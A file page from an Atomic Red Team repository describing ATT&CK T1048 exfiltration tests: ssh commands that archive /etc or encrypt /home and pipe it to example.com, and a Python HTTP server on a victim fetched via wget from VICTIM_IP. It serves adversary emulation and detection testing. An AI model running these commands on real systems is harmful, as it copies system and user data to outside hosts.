security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c35bad8d45814efd4607e669c43e6ee8369ce7c2
atomic-red-team/Linux/Exfiltration/Exfiltration_Over_Alternative_Protocol.md
T
ForensicITGuy e9f7a6c9ed Added test to exfil data over HTTP
2018-03-15 17:03:14 -05:00

834 B
Raw Blame History

Exfiltration Over Alternative Protocol

MITRE ATT&CK Technique: T1048

SSH

Remote to Local:

ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

Local to Remote:

tar czpf - /home/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /home.tar.gz.enc'

HTTP

A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

Victim System Configuration:

mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

Using Python to establish a one-line HTTP server on victim system:

cd /tmp/victim-staging-area
python -m SimpleHTTPServer 1337

To retrieve the data from an adversary system:

wget http://VICTIM_IP:1337/victim-file.txt
Reference in New Issue View Git Blame Copy Permalink